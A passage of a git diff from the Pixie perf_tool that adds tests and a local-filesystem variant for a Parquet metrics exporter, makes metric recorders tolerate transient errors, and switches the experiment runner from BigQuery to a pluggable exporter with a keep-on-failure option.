15, 10, 30, 0, 0, time.UTC) + row := bufferedRow{ + ExperimentID: "test-id", + Timestamp: ts, + Name: "rss", + Value: 1024.0, + Tags: map[string]string{"pod": "pod-1"}, + } + tagKeys := []string{"node_name", "pod"} + + parquetRow := buildResultRow(row, tagKeys) + + assert.Equal(t, 6, len(parquetRow)) + + // Find the tag_node_name column (should be null). + // Alphabetical order: experiment_id(0), name(1), tag_node_name(2), tag_pod(3), timestamp(4), value(5) + tagNodeNameVal := parquetRow[2] + assert.True(t, tagNodeNameVal.IsNull(), "missing tag should produce a null value") + assert.Equal(t, 0, tagNodeNameVal.DefinitionLevel(), "null optional field should have definitionLevel=0") + + // tag_pod should be present. + tagPodVal := parquetRow[3] + assert.False(t, tagPodVal.IsNull()) + assert.Equal(t, 1, tagPodVal.DefinitionLevel(), "present optional field should have definitionLevel=1") +} + +func TestFlushBatch_WritesValidParquet(t *testing.T) { + tmpDir := t.TempDir() + var uploadedPath string + + e := &ParquetGCSExporter{ + batchSize: 100, + upload: func(ctx context.Context, objectPath string, localPath string) error { + // Copy the parquet file to our temp dir before it gets cleaned up. + dest := filepath.Join(tmpDir, filepath.Base(objectPath)) + src, err := os.Open(localPath) + if err != nil { + return err + } + defer src.Close() + dst, err := os.Create(dest) + if err != nil { + return err + } + defer dst.Close() + if _, err := io.Copy(dst, src); err != nil { + return err + } + uploadedPath = dest + return nil + }, + } + + ts := time.Date(2026, 4, 15, 12, 0, 0, 0, time.UTC) + rows := []bufferedRow{ + { + ExperimentID: "exp-1", + Timestamp: ts, + Name: "cpu_usage", + Value: 0.85, + Tags: map[string]string{"pod": "kelvin-abc", "node_name": "node-1"}, + }, + { + ExperimentID: "exp-1", + Timestamp: ts.Add(30 * time.Second), + Name: "rss", + Value: 1048576, + Tags: map[string]string{"pod": "kelvin-abc"}, + }, + } + + err := e.flushBatch(context.Background(), "test/path", 0, rows) + require.NoError(t, err) + require.NotEmpty(t, uploadedPath) + + // Read back the parquet file and verify contents. + f, err := os.Open(uploadedPath) + require.NoError(t, err) + defer f.Close() + + stat, err := f.Stat() + require.NoError(t, err) + + pf, err := parquet.OpenFile(f, stat.Size()) + require.NoError(t, err) + + schema := pf.Schema() + assert.Equal(t, int64(2), pf.NumRows()) + + // Verify schema has expected columns. + fields := schema.Fields() + fieldNames := make([]string, len(fields)) + for i, f := range fields { + fieldNames[i] = f.Name() + } + sort.Strings(fieldNames) + assert.Equal(t, []string{ + "experiment_id", + "name", + "tag_node_name", + "tag_pod", + "timestamp", + "value", + }, fieldNames) + + // Re-open the file for the reader (the File consumed the initial handle). + f2, err := os.Open(uploadedPath) + require.NoError(t, err) + defer f2.Close() + + reader := parquet.NewReader(f2) + defer reader.Close() + + parquetRows := make([]parquet.Row, 2) + n, err := reader.ReadRows(parquetRows) + // ReadRows returns io.EOF when it reaches the end, even if it read rows. + if err != nil && !errors.Is(err, io.EOF) { + require.NoError(t, err) + } + assert.Equal(t, 2, n) + + // First row should have all tags present. + // Second row should have tag_node_name as null. + // Column order (alphabetical): experiment_id(0), name(1), tag_node_name(2), tag_pod(3), timestamp(4), value(5) + row0NodeName := parquetRows[0][2] + assert.False(t, row0NodeName.IsNull(), "first row tag_node_name should be present") + + row1NodeName := parquetRows[1][2] + assert.True(t, row1NodeName.IsNull(), "second row tag_node_name should be null") +} + +func TestExportResults_SingleBatch(t *testing.T) { + tmpDir := t.TempDir() + uploadedFiles := make(map[string]string) + + expID := uuid.Must(uuid.NewV4()) + e := &ParquetGCSExporter{ + prefix: "perf-results", + batchSize: 100, + upload: func(ctx context.Context, objectPath string, localPath string) error { + dest := filepath.Join(tmpDir, strings.ReplaceAll(objectPath, "/", "_")) + src, err := os.Open(localPath) + if err != nil { + return err + } + defer src.Close() + dst, err := os.Create(dest) + if err != nil { + return err + } + defer dst.Close() + if _, err := io.Copy(dst, src); err != nil { + return err + } + uploadedFiles[objectPath] = dest + return nil + }, + } + + resultCh := make(chan *metrics.ResultRow, 3) + ts := time.Date(2026, 4, 15, 14, 0, 0, 0, time.UTC) + resultCh <- &metrics.ResultRow{ + Timestamp: ts, + Name: "cpu_seconds_counter", + Value: 100.5, + Tags: map[string]string{"pod": "server-abc"}, + } + resultCh <- &metrics.ResultRow{ + Timestamp: ts.Add(30 * time.Second), + Name: "rss", + Value: 2097152, + Tags: map[string]string{"pod": "server-abc", "node_name": "node-0"}, + } + resultCh <- &metrics.ResultRow{ + Timestamp: ts.Add(60 * time.Second), + Name: "vsize", + Value: 4194304, + Tags: map[string]string{"pod": "server-abc", "node_name": "node-0"}, + } + close(resultCh) + + err := e.ExportResults(context.Background(), expID, resultCh) + require.NoError(t, err) + + // Should have produced exactly one batch file. + assert.Equal(t, 1, len(uploadedFiles), "expected exactly one parquet file") + + // Verify the GCS path includes the date and experiment ID. + for objectPath := range uploadedFiles { + assert.Contains(t, objectPath, expID.String()) + assert.Contains(t, objectPath, "perf-results/") + assert.Contains(t, objectPath, "results_0000.parquet") + } + + // Read the parquet file and verify row count. + for _, localPath := range uploadedFiles { + f, err := os.Open(localPath) + require.NoError(t, err) + defer f.Close() + + stat, err := f.Stat() + require.NoError(t, err) + + pf, err := parquet.OpenFile(f, stat.Size()) + require.NoError(t, err) + assert.Equal(t, int64(3), pf.NumRows()) + + // Verify schema has tag columns from the union of all rows. + fields := pf.Schema().Fields() + fieldNames := make([]string, len(fields)) + for i, f := range fields { + fieldNames[i] = f.Name() + } + sort.Strings(fieldNames) + assert.Equal(t, []string{ + "experiment_id", + "name", + "tag_node_name", + "tag_pod", + "timestamp", + "value", + }, fieldNames) + } +} + +func TestExportResults_MultipleBatches(t *testing.T) { + tmpDir := t.TempDir() + uploadedFiles := make(map[string]string) + + expID := uuid.Must(uuid.NewV4()) + e := &ParquetGCSExporter{ + batchSize: 2, // Small batch size to force multiple files. + upload: func(ctx context.Context, objectPath string, localPath string) error { + dest := filepath.Join(tmpDir, strings.ReplaceAll(objectPath, "/", "_")) + src, err := os.Open(localPath) + if err != nil { + return err + } + defer src.Close() + dst, err := os.Create(dest) + if err != nil { + return err + } + defer dst.Close() + if _, err := io.Copy(dst, src); err != nil { + return err + } + uploadedFiles[objectPath] = dest + return nil + }, + } + + resultCh := make(chan *metrics.ResultRow, 5) + ts := time.Date(2026, 4, 15, 14, 0, 0, 0, time.UTC) + for i := 0; i < 5; i++ { + resultCh <- &metrics.ResultRow{ + Timestamp: ts.Add(time.Duration(i) * 30 * time.Second), + Name: "cpu_usage", + Value: float64(i) * 0.1, + Tags: map[string]string{"pod": "test-pod"}, + } + } + close(resultCh) + + err := e.ExportResults(context.Background(), expID, resultCh) + require.NoError(t, err) + + // 5 rows with batch size 2 should produce 3 files: [2, 2, 1]. + assert.Equal(t, 3, len(uploadedFiles), "expected 3 parquet files for 5 rows with batch size 2") + + // Verify file naming. + hasFile0, hasFile1, hasFile2 := false, false, false + for objectPath := range uploadedFiles { + if strings.Contains(objectPath, "results_0000.parquet") { + hasFile0 = true + } + if strings.Contains(objectPath, "results_0001.parquet") { + hasFile1 = true + } + if strings.Contains(objectPath, "results_0002.parquet") { + hasFile2 = true + } + } + assert.True(t, hasFile0, "missing results_0000.parquet") + assert.True(t, hasFile1, "missing results_0001.parquet") + assert.True(t, hasFile2, "missing results_0002.parquet") + + // Verify total row count across all files. + totalRows := int64(0) + for _, localPath := range uploadedFiles { + f, err := os.Open(localPath) + require.NoError(t, err) + defer f.Close() + stat, err := f.Stat() + require.NoError(t, err) + pf, err := parquet.OpenFile(f, stat.Size()) + require.NoError(t, err) + totalRows += pf.NumRows() + } + assert.Equal(t, int64(5), totalRows) +} + +func TestExportResults_EmptyChannel(t *testing.T) { + uploadCalled := false + e := &ParquetGCSExporter{ + batchSize: 100, + upload: func(ctx context.Context, objectPath string, localPath string) error { + uploadCalled = true + return nil + }, + } + + resultCh := make(chan *metrics.ResultRow) + close(resultCh) + + expID := uuid.Must(uuid.NewV4()) + err := e.ExportResults(context.Background(), expID, resultCh) + require.NoError(t, err) + assert.False(t, uploadCalled, "no files should be uploaded for empty channel") +} + +// --- Benchmarks --- + +// makeBenchRows generates n buffered rows with the specified number of tag keys. +func makeBenchRows(n int, numTags int) []bufferedRow { + ts := time.Date(2026, 4, 15, 12, 0, 0, 0, time.UTC) + rows := make([]bufferedRow, n) + for i := range rows { + tags := make(map[string]string, numTags) + for j := 0; j < numTags; j++ { + tags[fmt.Sprintf("tag_key_%d", j)] = fmt.Sprintf("value_%d_%d", i, j) + } + rows[i] = bufferedRow{ + ExperimentID: "bench-exp-id", + Timestamp: ts.Add(time.Duration(i) * 30 * time.Second), + Name: "cpu_usage", + Value: float64(i) * 0.01, + Tags: tags, + } + } + return rows +} + +func BenchmarkBuildResultRow(b *testing.B) { + for _, numTags := range []int{2, 5, 10} { + b.Run(fmt.Sprintf("tags=%d", numTags), func(b *testing.B) { + rows := makeBenchRows(1, numTags) + tagKeys := collectTagKeys(rows) + row := rows[0] + b.ResetTimer() + b.ReportAllocs() + for i := 0; i < b.N; i++ { + buildResultRow(row, tagKeys) + } + }) + } +} + +func BenchmarkCollectTagKeys(b *testing.B) { + for _, numRows := range []int{100, 1000, 10000} { + b.Run(fmt.Sprintf("rows=%d", numRows), func(b *testing.B) { + rows := makeBenchRows(numRows, 3) + b.ResetTimer() + b.ReportAllocs() + for i := 0; i < b.N; i++ { + collectTagKeys(rows) + } + }) + } +} + +func BenchmarkFlushBatch(b *testing.B) { + for _, numRows := range []int{100, 1000, 10000} { + b.Run(fmt.Sprintf("rows=%d", numRows), func(b *testing.B) { + rows := makeBenchRows(numRows, 3) + e := &ParquetGCSExporter{ + batchSize: numRows, + upload: func(ctx context.Context, objectPath string, localPath string) error { + // No-op upload: measures only in-memory conversion + parquet write to disk. + return nil + }, + } + b.ResetTimer() + b.ReportAllocs() + for i := 0; i < b.N; i++ { + if err := e.flushBatch(context.Background(), "bench/path", 0, rows); err != nil { + b.Fatal(err) + } + } + }) + } +} diff --git a/src/e2e_test/perf_tool/pkg/exporter/parquet_local_exporter.go b/src/e2e_test/perf_tool/pkg/exporter/parquet_local_exporter.go new file mode 100644 index 00000000000..48324413f3d --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/parquet_local_exporter.go @@ -0,0 +1,199 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +package exporter + +import ( + "context" + "errors" + "fmt" + "os" + "path/filepath" + "time" + + "github.com/gofrs/uuid" + "github.com/parquet-go/parquet-go" + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" +) + +// ParquetLocalExporter writes the same parquet artifacts as +// ParquetGCSExporter, but to a directory on the local filesystem instead +// of a GCS bucket. The on-disk layout (`//YYYY/MM/DD//...`) +// matches the GCS object layout exactly, so downstream BigQuery external +// tables, DuckDB readers, or DataStudio connectors can be re-pointed +// with just a base-URL swap. +// +// Use cases: +// - Iterating on the perf_tool against a local k3s without paying for a +// GCS bucket round-trip. +// - CI on hosts without GCP credentials (the build VM in particular). +// - Reproducing parquet output deterministically for diff'ing. +type ParquetLocalExporter struct { + dir string + prefix string + batchSize int +} + +// NewParquetLocalExporter constructs a local-fs parquet exporter. +// `dir` is created with mkdir -p semantics if it does not exist. +func NewParquetLocalExporter(dir, prefix string, batchSize int) (*ParquetLocalExporter, error) { + if dir == "" { + return nil, errors.New("parquet-local: --parquet_dir is required when using parquet-local backend") + } + if err := os.MkdirAll(dir, 0o755); err != nil { + return nil, fmt.Errorf("parquet-local: mkdir %q: %w", dir, err) + } + return &ParquetLocalExporter{ + dir: dir, + prefix: prefix, + batchSize: batchSize, + }, nil +} + +// ExportResults consumes metrics from resultCh and writes them as +// batched parquet files under the experiment-specific directory. +func (e *ParquetLocalExporter) ExportResults(ctx context.Context, expID uuid.UUID, resultCh <-chan *metrics.ResultRow) error { + now := time.Now() + basePath := e.localPath(now, expID) + if err := os.MkdirAll(basePath, 0o755); err != nil { + return fmt.Errorf("parquet-local: mkdir %q: %w", basePath, err) + } + seqNum := 0 + batch := make([]bufferedRow, 0, e.batchSize) + + for row := range resultCh { + batch = append(batch, bufferedRow{ + ExperimentID: expID.String(), + Timestamp: row.Timestamp, + Name: row.Name, + Value: row.Value, + Tags: row.Tags, + }) + if len(batch) >= e.batchSize { + if err := e.flushBatch(basePath, seqNum, batch); err != nil { + return err + } + seqNum++ + batch = batch[:0] + } + } + + if len(batch) > 0 { + if err := e.flushBatch(basePath, seqNum, batch); err != nil { + return err + } + } + return nil +} + +// ExportSpec writes the experiment spec as a parquet file alongside the +// results. +func (e *ParquetLocalExporter) ExportSpec(ctx context.Context, expID uuid.UUID, encodedSpec string, commitTopoOrder int) error { + type specRow struct { + ExperimentID string `parquet:"experiment_id"` + Spec string `parquet:"spec"` + CommitTopoOrder int64 `parquet:"commit_topo_order"` + } + + now := time.Now() + basePath := e.localPath(now, expID) + if err := os.MkdirAll(basePath, 0o755); err != nil { + return fmt.Errorf("parquet-local: mkdir %q: %w", basePath, err) + } + dst := filepath.Join(basePath, "spec.parquet") + f, err := os.Create(dst) + if err != nil { + return fmt.Errorf("parquet-local: create %q: %w", dst, err) + } + writer := parquet.NewGenericWriter[specRow](f) + if _, err := writer.Write([]specRow{{ + ExperimentID: expID.String(), + Spec: encodedSpec, + CommitTopoOrder: int64(commitTopoOrder), + }}); err != nil { + f.Close() + return fmt.Errorf("parquet-local: write spec parquet: %w", err) + } + if err := writer.Close(); err != nil { + f.Close() + return fmt.Errorf("parquet-local: close spec writer: %w", err) + } + if err := f.Close(); err != nil { + return fmt.Errorf("parquet-local: close spec file: %w", err) + } + log.WithField("path", dst).Info("Wrote spec parquet") + return nil +} + +// Close releases resources. No-op for the local exporter. +func (e *ParquetLocalExporter) Close() error { return nil } + +// localPath mirrors ParquetGCSExporter.gcsPath: //YYYY/MM/DD/. +func (e *ParquetLocalExporter) localPath(t time.Time, expID uuid.UUID) string { + datePath := t.Format("2006/01/02") + if e.prefix != "" { + return filepath.Join(e.dir, e.prefix, datePath, expID.String()) + } + return filepath.Join(e.dir, datePath, expID.String()) +} + +func (e *ParquetLocalExporter) flushBatch(basePath string, seqNum int, rows []bufferedRow) error { + tagKeys := collectTagKeys(rows) + schema := buildResultSchema(tagKeys) + + dst := filepath.Join(basePath, fmt.Sprintf("results_%04d.parquet", seqNum)) + tmp, err := os.CreateTemp(basePath, fmt.Sprintf(".results_%04d.*.parquet", seqNum)) + if err != nil { + return fmt.Errorf("parquet-local: create temp in %q: %w", basePath, err) + } + tmpPath := tmp.Name() + + writer := parquet.NewWriter(tmp, schema) + cleanup := func(wrap string, cause error) error { + tmp.Close() + os.Remove(tmpPath) + return fmt.Errorf("parquet-local: %s: %w", wrap, cause) + } + for _, row := range rows { + parquetRow := buildResultRow(row, tagKeys) + if _, err := writer.WriteRows([]parquet.Row{parquetRow}); err != nil { + return cleanup("write row", err) + } + } + if err := writer.Close(); err != nil { + return cleanup("close writer", err) + } + if err := tmp.Close(); err != nil { + os.Remove(tmpPath) + return fmt.Errorf("parquet-local: close temp: %w", err) + } + // Atomic publish via rename — temp lives under basePath so we stay + // on one filesystem. + if err := os.Rename(tmpPath, dst); err != nil { + os.Remove(tmpPath) + return fmt.Errorf("parquet-local: rename %q -> %q: %w", tmpPath, dst, err) + } + log.WithField("path", dst).WithField("rows", len(rows)).Info("Wrote parquet batch") + return nil +} + +// Compile-time assertion that ParquetLocalExporter satisfies the +// Exporter interface. +var _ Exporter = (*ParquetLocalExporter)(nil) diff --git a/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go b/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go index 19d08b1b0a9..8e5c1768e24 100644 --- a/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go +++ b/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go @@ -43,10 +43,11 @@ import ( ) type prometheusRecorderImpl struct { - clusterCtx *cluster.Context - spec *experimentpb.PrometheusScrapeSpec - eg *errgroup.Group - resultCh chan<- *ResultRow + clusterCtx *cluster.Context + ownsClusterCtx bool + spec *experimentpb.PrometheusScrapeSpec + eg *errgroup.Group + resultCh chan<- *ResultRow wg sync.WaitGroup stopCh chan struct{} @@ -79,6 +80,9 @@ func (r *prometheusRecorderImpl) Close() { for _, fw := range r.fws { fw.Close() } + if r.ownsClusterCtx { + r.clusterCtx.Close() + } } func (r *prometheusRecorderImpl) run() error { diff --git a/src/e2e_test/perf_tool/pkg/metrics/pxl_script_recorder.go b/src/e2e_test/perf_tool/pkg/metrics/pxl_script_recorder.go index 01d7cbbbb11..426622d68d3 100644 --- a/src/e2e_test/perf_tool/pkg/metrics/pxl_script_recorder.go +++ b/src/e2e_test/perf_tool/pkg/metrics/pxl_script_recorder.go @@ -136,14 +136,19 @@ func (r *pxlScriptRecorderImpl) runPeriodicScript(ctx context.Context) error { } t := time.NewTicker(d) + // Tolerate transient errors per-iteration — the AOCC cloud passthrough + // proxy races the forwarder occasionally (see "Query not registered + // in query forwarder" — ~0.66% of recorder iterations at exportPeriod=5s), + // and returning here aborts the entire 25-min experiment for what is + // otherwise harmless. A persistently broken recorder will still surface + // via zero output rows on the downstream metric tables. for { select { case <-ctx.Done(): return nil case <-t.C: - err := r.executeScript(ctx) - if err != nil { - return err + if err := r.executeScript(ctx); err != nil { + log.WithError(err).Warn("recorder iteration failed; continuing") } } } diff --git a/src/e2e_test/perf_tool/pkg/metrics/recorder.go b/src/e2e_test/perf_tool/pkg/metrics/recorder.go index 7e7e44e06e2..12bdf8fd502 100644 --- a/src/e2e_test/perf_tool/pkg/metrics/recorder.go +++ b/src/e2e_test/perf_tool/pkg/metrics/recorder.go @@ -20,6 +20,7 @@ package metrics import ( "context" + "fmt" "golang.org/x/sync/errgroup" @@ -35,7 +36,7 @@ type Recorder interface { } // NewMetricsRecorder creates a new Recorder for the given MetricSpec. -func NewMetricsRecorder(pxCtx *pixie.Context, clusterCtx *cluster.Context, spec *experimentpb.MetricSpec, eg *errgroup.Group, resultCh chan<- *ResultRow) Recorder { +func NewMetricsRecorder(pxCtx *pixie.Context, clusterCtx *cluster.Context, spec *experimentpb.MetricSpec, eg *errgroup.Group, resultCh chan<- *ResultRow) (Recorder, error) { switch spec.MetricType.(type) { case *experimentpb.MetricSpec_PxL: return &pxlScriptRecorderImpl{ @@ -44,14 +45,26 @@ func NewMetricsRecorder(pxCtx *pixie.Context, clusterCtx *cluster.Context, spec eg: eg, resultCh: resultCh, - } + }, nil case *experimentpb.MetricSpec_Prom: - return &prometheusRecorderImpl{ - clusterCtx: clusterCtx, - spec: spec.GetProm(), - eg: eg, - resultCh: resultCh, + promSpec := spec.GetProm() + recorderCtx := clusterCtx + ownsCtx := false + if promSpec.KubeconfigPath != "" || promSpec.KubeContext != "" { + var err error + recorderCtx, err = cluster.NewContextFromOptions(promSpec.KubeconfigPath, promSpec.KubeContext) + if err != nil { + return nil, fmt.Errorf("failed to create cluster context for prometheus recorder: %w", err) + } + ownsCtx = true } + return &prometheusRecorderImpl{ + clusterCtx: recorderCtx, + ownsClusterCtx: ownsCtx, + spec: promSpec, + eg: eg, + resultCh: resultCh, + }, nil } - return nil + return nil, nil } diff --git a/src/e2e_test/perf_tool/pkg/run/BUILD.bazel b/src/e2e_test/perf_tool/pkg/run/BUILD.bazel index 55b3fdc18a9..524a3cab626 100644 --- a/src/e2e_test/perf_tool/pkg/run/BUILD.bazel +++ b/src/e2e_test/perf_tool/pkg/run/BUILD.bazel @@ -18,19 +18,16 @@ load("@io_bazel_rules_go//go:def.bzl", "go_library") go_library( name = "run", - srcs = [ - "row.go", - "run.go", - ], + srcs = ["run.go"], importpath = "px.dev/pixie/src/e2e_test/perf_tool/pkg/run", visibility = ["//visibility:public"], deps = [ "//src/e2e_test/perf_tool/experimentpb:experiment_pl_go_proto", "//src/e2e_test/perf_tool/pkg/cluster", "//src/e2e_test/perf_tool/pkg/deploy", + "//src/e2e_test/perf_tool/pkg/exporter", "//src/e2e_test/perf_tool/pkg/metrics", "//src/e2e_test/perf_tool/pkg/pixie", - "//src/shared/bq", "@com_github_cenkalti_backoff_v4//:backoff", "@com_github_gofrs_uuid//:uuid", "@com_github_gogo_protobuf//jsonpb", diff --git a/src/e2e_test/perf_tool/pkg/run/run.go b/src/e2e_test/perf_tool/pkg/run/run.go index b02b15219c2..2a5af23d06e 100644 --- a/src/e2e_test/perf_tool/pkg/run/run.go +++ b/src/e2e_test/perf_tool/pkg/run/run.go @@ -39,18 +39,22 @@ import ( "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster" "px.dev/pixie/src/e2e_test/perf_tool/pkg/deploy" + "px.dev/pixie/src/e2e_test/perf_tool/pkg/exporter" "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" "px.dev/pixie/src/e2e_test/perf_tool/pkg/pixie" - "px.dev/pixie/src/shared/bq" ) // Runner is responsible for running experiments using the ClusterProvider to get a cluster for the experiment. type Runner struct { c cluster.Provider pxCtx *pixie.Context - resultTable *bq.Table - specTable *bq.Table + exporter exporter.Exporter containerRegistryRepo string + skaffoldStderrFile string + // KeepOnFailure, when true, skips teardown (stop vizier/workloads/recorders + // and cluster cleanup) if the experiment errors, so the cluster state can + // be inspected after the fact. Successful runs still tear down normally. + keepOnFailure bool clusterCtx *cluster.Context clusterCleanup func() @@ -66,16 +70,24 @@ type Runner struct { } // NewRunner creates a new Runner for the given contexts. -func NewRunner(c cluster.Provider, pxCtx *pixie.Context, resultTable *bq.Table, specTable *bq.Table, containerRegistryRepo string) *Runner { +// skaffoldStderrFile, when non-empty, is the path to which skaffold's stderr is appended +// during deploy steps. Pass "" to keep skaffold's stderr going only to the perf_tool +// process's stderr. +func NewRunner(c cluster.Provider, pxCtx *pixie.Context, exp exporter.Exporter, containerRegistryRepo, skaffoldStderrFile string) *Runner { return &Runner{ c: c, pxCtx: pxCtx, - resultTable: resultTable, - specTable: specTable, + exporter: exp, containerRegistryRepo: containerRegistryRepo, + skaffoldStderrFile: skaffoldStderrFile, } } +// SetKeepOnFailure toggles whether teardown is skipped on experiment failure. +func (r *Runner) SetKeepOnFailure(v bool) { + r.keepOnFailure = v +} + // RunExperiment runs an experiment according to the given ExperimentSpec. func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *experimentpb.ExperimentSpec) error { commitTopoOrder, err := getTopoOrder() @@ -83,14 +95,12 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper return err } - eg := errgroup.Group{} - eg.Go(func() error { return r.getCluster(ctx, spec.ClusterSpec) }) - eg.Go(func() error { - if err := r.prepareWorkloads(ctx, spec); err != nil { - return backoff.Permanent(err) - } - return nil - }) + if err := r.getCluster(ctx, spec.ClusterSpec); err != nil { + return err + } + if err := r.prepareWorkloads(ctx, spec); err != nil { + return err + } r.metricsBySelector = make(map[string][]metrics.Recorder) r.metricsResultCh = make(chan *metrics.ResultRow) @@ -98,19 +108,23 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper defer metricsChCloseOnce.Do(func() { close(r.metricsResultCh) }) r.wg.Add(1) - go r.runBQInserter(expID) - - if err := eg.Wait(); err != nil { - if r.clusterCleanup != nil { - r.clusterCleanup() + go func() { + defer r.wg.Done() + if err := r.exporter.ExportResults(ctx, expID, r.metricsResultCh); err != nil { + log.WithError(err).Error("Failed to export results") } - if r.clusterCtx != nil { - r.clusterCtx.Close() + }() + + var runErr error + defer func() { + if r.keepOnFailure && runErr != nil { + log.WithError(runErr).Warn("Experiment failed; --keep_on_failure is set, leaving cluster state intact. " + + "Inspect with kubectl; you are responsible for manual cleanup (e.g. `px delete`, delete workload namespaces).") + return } - return err - } - defer r.clusterCleanup() - defer r.clusterCtx.Close() + r.clusterCleanup() + r.clusterCtx.Close() + }() var egCtx context.Context r.eg, egCtx = errgroup.WithContext(ctx) @@ -123,26 +137,16 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper }) if err := r.eg.Wait(); err != nil { + runErr = err return err } - // The experiment succeeded so we write the spec to bigquery. + // The experiment succeeded so we write the spec to the exporter. encodedSpec, err := (&jsonpb.Marshaler{}).MarshalToString(spec) if err != nil { return err } - specRow := &SpecRow{ - ExperimentID: expID.String(), - Spec: encodedSpec, - CommitTopoOrder: commitTopoOrder, - } - - inserter := r.specTable.Inserter() - inserter.SkipInvalidRows = false - - putCtx, cancel := context.WithTimeout(ctx, 5*time.Minute) - defer cancel() - if err := inserter.Put(putCtx, specRow); err != nil { + if err := r.exporter.ExportSpec(ctx, expID, encodedSpec, commitTopoOrder); err != nil { return err } @@ -152,8 +156,21 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper return nil } -func (r *Runner) runActions(ctx context.Context, spec *experimentpb.ExperimentSpec) error { +func (r *Runner) runActions(ctx context.Context, spec *experimentpb.ExperimentSpec) (retErr error) { canceledErr := backoff.Permanent(context.Canceled) + // Collect start-action cleanups explicitly so we can skip them when + // --keep_on_failure is set and the experiment errors. + var cleanups []func() + defer func() { + failed := retErr != nil || ctx.Err() != nil + if r.keepOnFailure && failed { + log.Warn("Skipping per-action teardown due to --keep_on_failure") + return + } + for i := len(cleanups) - 1; i >= 0; i-- { + cleanups[i]() + } + }() for _, a := range spec.RunSpec.Actions { log.Tracef("started action %s", experimentpb.ActionType_name[int32(a.Type)]) if canceled := r.sendActionTimestamp(ctx, a, "begin"); canceled { @@ -165,19 +182,19 @@ func (r *Runner) runActions(ctx context.Context, spec *experimentpb.ExperimentSp if err != nil { return err } - defer cleanup() + cleanups = append(cleanups, cleanup) case experimentpb.START_WORKLOADS: cleanup, err := r.startWorkloads(ctx, spec, a.Name) if err != nil { return err } - defer cleanup() + cleanups = append(cleanups, cleanup) case experimentpb.START_METRIC_RECORDERS: cleanup, err := r.startMetricRecorders(ctx, spec, a.Name) if err != nil { return err } - defer cleanup() + cleanups = append(cleanups, cleanup) case experimentpb.STOP_VIZIER: if err := r.stopVizier(); err != nil { return err @@ -233,7 +250,11 @@ func (r *Runner) startMetricRecorders(ctx context.Context, spec *experimentpb.Ex continue } - recorder := metrics.NewMetricsRecorder(r.pxCtx, r.clusterCtx, ms, r.eg, r.metricsResultCh) + recorder, err := metrics.NewMetricsRecorder(r.pxCtx, r.clusterCtx, ms, r.eg, r.metricsResultCh) + if err != nil { + _ = r.stopMetricRecorders(selector) + return noCleanup, fmt.Errorf("failed to create metrics recorder: %w", err) + } r.metricsBySelector[selector] = append(r.metricsBySelector[selector], recorder) if err := recorder.Start(ctx); err != nil { _ = r.stopMetricRecorders(selector) @@ -344,7 +365,7 @@ func (r *Runner) getCluster(ctx context.Context, spec *experimentpb.ClusterSpec) } func (r *Runner) prepareWorkloads(ctx context.Context, spec *experimentpb.ExperimentSpec) error { - vizier, err := deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, spec.VizierSpec) + vizier, err := deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, r.skaffoldStderrFile, spec.VizierSpec) if err != nil { return err } @@ -355,7 +376,7 @@ func (r *Runner) prepareWorkloads(ctx context.Context, spec *experimentpb.Experi } r.workloadsBySelector = make(map[string][]deploy.Workload) for _, s := range spec.WorkloadSpecs { - w, err := deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, s) + w, err := deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, r.skaffoldStderrFile, s) if err != nil { return err } @@ -368,29 +389,6 @@ func (r *Runner) prepareWorkloads(ctx context.Context, spec *experimentpb.Experi return nil } -func (r *Runner) runBQInserter(expID uuid.UUID) { - defer r.wg.Done() - - bqCh := make(chan interface{}) - defer close(bqCh) - - inserter := &bq.BatchInserter{ - Table: r.resultTable, - BatchSize: 512, - PushTimeout: 2 * time.Minute, - } - go inserter.Run(bqCh) - - for row := range r.metricsResultCh { - bqRow, err := MetricsRowToResultRow(expID, row) - if err != nil { - log.WithError(err).Error("Failed to convert result row") - continue - } - bqCh <- bqRow - } -} - func getTopoOrder() (int, error) { cmd := exec.Command("git", "rev-list", "--count", "HEAD") var stdout bytes.Buffer diff --git a/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel b/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel index 57b8a9fe368..5853d236094 100644 --- a/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel +++ b/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel @@ -22,11 +22,16 @@ go_library( "clusters.go", "experiments.go", "metrics.go", + "sovereign_soc.go", "suites.go", "workloads.go", ], embedsrcs = [ + "scripts/clickhouse_export.pxl", + "scripts/clickhouse_read.pxl", + "scripts/forensic_alerts.pxl", "scripts/healthcheck/http_data_in_namespace.pxl", + "scripts/healthcheck/redis_data_in_namespace.pxl", "scripts/healthcheck/vizier.pxl", "scripts/heap_size.pxl", "scripts/http_data_loss.pxl", diff --git a/src/e2e_test/perf_tool/pkg/suites/experiments.go b/src/e2e_test/perf_tool/pkg/suites/experiments.go index 998b31c7197..ceaf7408e2b 100644 --- a/src/e2e_test/perf_tool/pkg/suites/experiments.go +++ b/src/e2e_test/perf_tool/pkg/suites/experiments.go @@ -36,7 +36,7 @@ func 